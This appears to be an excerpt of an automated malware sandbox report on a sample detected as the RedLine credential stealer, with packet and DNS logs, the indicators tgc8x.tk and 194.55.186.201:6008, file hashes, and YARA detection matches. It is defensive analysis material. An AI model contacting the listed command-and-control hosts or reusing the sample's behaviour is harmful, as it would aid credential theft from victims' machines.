Nov 3, 2022 12:44:39.908418894 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:39.959028006 CET | 49695 | 443 | 192.168.2.4 | 50.115.174.192
Nov 3, 2022 12:44:40.083826065 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
Nov 3, 2022 12:44:40.083920956 CET | 443 | 49695 | 50.115.174.192 | 192.168.2.4
                                                            Nov 3, 2022 12:44:40.083951950 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.083975077 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084000111 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084011078 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084038019 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084050894 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084079981 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084084988 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084095001 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084135056 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084188938 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084243059 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084292889 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084342957 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084368944 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084418058 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084441900 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084495068 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084501028 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084513903 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084549904 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084567070 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084568024 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084578991 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084625959 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084633112 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084681034 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084712029 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.093774080 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.098267078 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.098331928 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.098745108 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.099368095 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.099400997 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.465075970 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.496548891 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.496577024 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820102930 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820142984 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820180893 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820293903 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.820327997 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820374012 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.865231991 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.997716904 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997739077 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997828007 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997838974 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997839928 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.997905970 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997910976 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.997925043 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997952938 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.998018026 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.998064995 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.999274969 CET49696443192.168.2.450.115.174.192
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 3, 2022 12:44:38.337913990 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8
Nov 3, 2022 12:44:38.365986109 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4
Nov 3, 2022 12:45:07.954663992 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
Nov 3, 2022 12:45:07.986056089 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 3, 2022 12:44:38.337913990 CET | 192.168.2.4 | 8.8.8.8 | 0x53e5 | Standard query (0) | tgc8x.tk | A (IP address) | IN (0x0001) | false
Nov 3, 2022 12:45:07.954663992 CET | 192.168.2.4 | 8.8.8.8 | 0x5f34 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Nov 3, 2022 12:45:07.986056089 CET | 192.168.2.4 | 8.8.8.8 | 0x3a | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 3, 2022 12:44:38.365986109 CET | 8.8.8.8 | 192.168.2.4 | 0x53e5 | No error (0) | tgc8x.tk |  | 50.115.174.192 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 12:45:07.974468946 CET | 8.8.8.8 | 192.168.2.4 | 0x5f34 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 3, 2022 12:45:08.007771969 CET | 8.8.8.8 | 192.168.2.4 | 0x3a | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
• tgc8x.tk
• 194.55.186.201:6008


Target ID: 0
Start time: 12:44:36
Start date: 03/11/2022
Path: C:\Users\user\Desktop\StZAEFSb2j.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\StZAEFSb2j.exe
Imagebase: 0x5d0000
File size: 43520 bytes
MD5 hash: C71616E2B7CEDF9FC8E2CA6F6929ABDF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 1
Start time: 12:44:40
Start date: 03/11/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase: 0xc10000
File size: 55400 bytes
MD5 hash: 17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate

Target ID: 2
Start time: 12:44:40
Start date: 03/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

No disassembly